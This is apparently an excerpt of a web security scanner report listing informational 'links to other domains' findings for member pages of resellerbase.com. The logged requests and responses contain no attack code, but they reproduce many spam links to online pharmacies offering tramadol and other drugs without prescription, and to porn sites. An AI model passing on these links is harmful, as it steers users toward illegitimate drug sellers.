<a href="http://www.buy-buspar-pills.com">Buy Buspar Pills</a> | <a href="http://www.lowcostpillsource.com">Low Cost Pill Source</a> | <a href="http://www.tobuyhealth.com">To Buy Health</a> | <a href="http://www.order-fioricet-pills.com"> Order Fioricet Pills</a> | <a href="http://www.PILLS-STORE-ONLINE.COM"> Pills Store Online </a> | <a href="http://www.erxpharma-online.com"> E Rx Pharma Online </a>|<a href="http://www.needrxquick.com"> Need Rx Quick </a> | <a href="http://www.get-rx-pharmacy.com"> Get Rx Pharmacy </a> <a href="http://www.PILLS-STORE-ONLINE.COM/esgic-plus.php"> Esgic Plus Generic </a> | <a href="http://www.healthfitnessportal.com"> Health Fitness Portal </a> | <a href="http://www.genericmedsale.com/celexa.php"> Generic Med Celexa </a> | <a href="http://www.genericmedsale.com/buspar.php"> Med Sale Buspar </a> | <a href="http://www.genericmedsale.com/fioricet.php"> Generic Fioricet </a> | <a href="http://www.genericmedsale.com/tramadol.php"> Generic Sale for Tramadol </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.320. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=maraton HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:10:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.pharmaceutical-sale.com/">http://www.pharmaceutical-sale.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.pharmaceutical-sale.com/tramadol.php">Tramadol From Your Pharmacy</a> | <a href="http://www.pharmaceutical-sale.com/celexa.php">Celexa Online</a> | <a href="http://www.pharmaceutical-sale.com/buspar.php">Buspar Rx For You</a> | <a href="http://www.pharmaceutical-sale.com/fioricet.php"> Fioricet For Pain Relief</a> | <a href="http://www.pharmaceutical-sale.com/esgic-plus.php">Treat Your Headache With Esgic Plus </a> | <a href="http://www.pharmaceutical-sale.com/elidel.php"> Buy Elidel - Skin Care Antitod </a>|<a href="http://www.pharmaceutical-sale.com/prozac.php"> Prozac Anti Depressant</a> | <a href="http://www.pharmaceutical-sale.com/paxil.php"> Paxil To Treat Depression </a> | <a href="http://www.drugpharmacist.com"> Drug Pharmacist </a> | <a href="http://www.medicare-california.com"> Medicare California </a> | <a href="http://www.rxmedicare.org/"> Rx Medicare Information </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.321. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=0000001 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
</a><a href=http://www.euro-drugs.biz> Prescriptions online</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Silagra.htm>Silagra indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Tenvir.htm>Tenvir indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/drugs/Terramycin.htm>Terramycin indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/drugs/Tobradex.htm>Tobradex indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Triomune.htm>Triomune indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Urimax.htm>Urimax indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/drugs/Vagifem.htm>Vagifem indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Venlor.htm>Venlor indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Viraday.htm>Viraday indications</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.322. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=boman HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.trustedstore.info/">http://www.trustedstore.info/</a>
...[SNIP]...
<td width="130">
<a href="http://www.typos-words.com">Typos Words</a> | <a href="http://www.drug-care.info/">Drug Care</a> | <a href="http://www.drugviews.com/">Drug Views</a> | <a href="http://www.druginformations.org/"> Drug Informations</a> | <a href="http://www.pillsbenefit.com/">Pills Benefit </a> | <a href="http://www.rightplacetobuy.com/"> Right Place To Buy </a>|<a href="http://www.herbals4ever.com/"> Herbals For Ever</a> | <a href="http://www.herbal-women.com/"> Herbal Woman </a> | <a href="http://www.typosdomain.com"> Typos Domain </a> | <a href="http://www.you-can-buy.com"> You Can Buy </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.323. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=darfyh HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:01:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.drugsforyourhealth.com/">http://www.drugsforyourhealth.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.customerpharmacy.com">Customer Pharmacy</a> | <a href="http://www.freebonusrx.com">Free Bonus Rx</a> | <a href="http://www.healthcare-opportunity.com">Healthcare Opportunity</a> | <a href="http://www.prescriptionconsult.com"> Prescription Consult</a> | <a href="http://www.rxalternativehealth.com">Rx Alternative Health </a> | <a href="http://www.NARCOTICRX.COM">Narcotic Rx </a> | <a href="http://www.SLEEPINESS-PHARMACY.COM">Sleepiness Pharmacy </a> | <a href="http://www.xlmedrx.com/">Xl Med Rx</a> | <a href="http://www.pharmacysalesonline.com"> Pharmacy Sales Online</a>| <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=1">Buy Anti Depressants</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=10">Get Antibiotics</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=69">Order Asthma Products</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=5">Blood Presure</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=7">Diabetes Pills</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=76">Formigran, Maxalt, Migraeflux, Pirazetam</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=174">Adekin For Parkinson</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=11">Sleep & Insomnia - Novanox, Planum</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=74">Cholesterol - Ezetrol, Simvastatin, Sortis, Zocor</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.324. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=natural HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:07:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 13984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.tramadol-rx.com/">http://www.tramadol-rx.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.tramadoltramodol.com/">Tramadol Tramdol</a> <a href="http://www.tramadolhclbuy.com/">Tramadol HCL Buy</a> <a href="http://www.tramadolhydrochlorideonline.com/">Tramadol Hydrochloride Online</a> <a href="http://www.buytramadolcod.com/">Buy Tramadol Cod</a> <a href="http://www.tramadoldiscounts.com/">Tramadol Discounts</a> <a href="http://www.buytramadoltablets.com/">Buy Tramadol Tablets</a> <a href="http://www.tramadolprice.org/">Tramadol Price</a> <a href="http://www.odertramadolonline.com/">Order Tramadol Online</a> <a href="http://www.onlinetramadolrx.com/">Online Tramadol Rx</a> <a href="http://www.norxtramadol.com/">No Rx Tramadol</a> <a href="http://www.tramadolcheapbuy.com/">Tramadol Cheap Buy</a> <a href="http://www.tramadolmedicationonline.com/">Tramadol Medication Online</a> <a href="http://www.onlinetramadolprescription.com/">Online Tramadol Prescription</a> <a href="http://www.cheaptramadolbuy.com/">Cheap Tramadol Buy </a> <a href="http://www.tramadolpharmacist.com/">Tramadol Pharmacist </a> <a href="http://www.tramadolsupply.com/">Tramadol Supply</a> <a href="http://www.tramadolsideeffects.com/">Tramadol Side Effects</a> <a href="http://www.drugcompare.org/tramadol-price-and-alternatives/">Tramadol Drug Compare</a> <a href="http://www.sideeffectsof.me/tramadol/"> Tramadol </a> <a href="http://www.rxmedicare.org/tag/pain/">Rx Medicare on Pain </a> <a href="http://www.tramadol-rx.com/tramadol.php">Tramadol </a> <a href="http://www.pillsideeffects.com/category/analgesics-painkillers/">Pills Side Effects </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.325. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=cabanos HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:00:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.the-sex-directory.com/">http://www.the-sex-directory.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.videopornz.com/">Video Pornz</a> | <a href="http://www.xxxclipsxxx.com/">Xxx Clips</a> | <a href="http://www.bodydating.com/">Body Dating</a> | <a href="http://www.dateoncam.com/"> Date On Cam</a> | <a href="http://www.iabu.com/">Iabu</a> | <a href="http://www.idateclub.com/"> I Date Club </a>|<a href="http://www.videoaskout.com/"> Video Ask Out</a> | <a href="http://www.videohotdate.com/"> Video Hot Date </a> | <a href="http://www.modelsromania.com/"> Models Romania </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.326. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=sarcos HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.searchforglory.com/">http://www.searchforglory.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.searchforglory.com/quizz_questions.php?t=dating">Dating</a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=health">Health</a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=games"> Games</a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=money">Money </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=music"> Music </a>|<a href="http://www.searchforglory.com/quizz_questions.php?t=funny"> Funny </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=movies"> Movies </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=order"> Order</a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=financial"> Financial </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=credit"> Credit </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=card"> Card </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=education"> Education </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=loan"> Loan </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=buy"> Buy </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=bank"> Bank </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=business"> Business </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.327. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_detail.php?u=1staltor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.easy-rx-meds.net">http://www.easy-rx-meds.net</a>
...[SNIP]...
<td width="130">
<a href="http://www.easy-rx-meds.net">online pharmacy without prescription</a>
<a href="http://www.easy-rx-meds.net/Stugil.html">Order Stugil

</a> <a href="http://www.easy-rx-meds.net/Ticlopidine_Hydrochloride.html">Buy Ticlopidine Hydrochloride

</a> <a href="http://www.easy-rx-meds.net/Tizanidine_Ibuprofen.html">Buy Tizanidine/Ibuprofen

</a> <a href="http://www.easy-rx-meds.net/Colospa.html">Buy Colospa
online
</a> <a href="http://www.easy-rx-meds.net/Quinine.html">Buy Quinine

</a> <a href="http://www.easy-rx-meds.net/Mebeverine.html">Buy Mebeverine

</a> <a href="http://www.easy-rx-meds.net/Carbidopa__Levodopa.html">Order Carbidopa, Levodopa
without prescription</a> <a href="http://www.easy-rx-meds.net/Ofloxacin.html">Order Ofloxacin
online
</a> <a href="http://www.easy-rx-meds.net/Atenolol.html">Order Atenolol
online
</a> <a href="http://www.easy-rx-meds.net/Co-trimoxazole.html">Buy Co-trimoxazole

</a> <a href="http://www.easy-rx-meds.net/Lamictal.html">Buy Lamictal
without prescription
</a> <a href="http://www.easy-rx-meds.net/Carbimazole.html">Buy Carbimazole

</a> <a href="http://www.easy-rx-meds.net/Epivir.html">Order Epivir
online
</a> <a href="http://www.easy-rx-meds.net/Aralen.html">Order Aralen
online
</a> <a href="http://www.easy-rx-meds.net/Flavoxate_Hcl.html">Order Flavoxate Hcl

</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.328. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_detail.php?u=reedyweb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.reedy-web.com">http://www.reedy-web.com</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.329. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:58:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 28025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.trustedstore.info/">http://www.trustedstore.info/</a>
...[SNIP]...
<td><a href="http://www.the-sex-directory.com/">http://www.the-sex-directory.com/</a>
...[SNIP]...
<td><a href="http://www.drugsforyourhealth.com/">http://www.drugsforyourhealth.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.330. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pflag=search&ltr=S HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.searchforglory.com/">http://www.searchforglory.com/</a>
...[SNIP]...
<td><a href="http://www.somawatsonbrand.com/">http://www.somawatsonbrand.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.331. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pflag=search&ltr=U HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:58:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.buying-rx.com/">http://www.buying-rx.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.332. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pflag=search&ltr=R HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
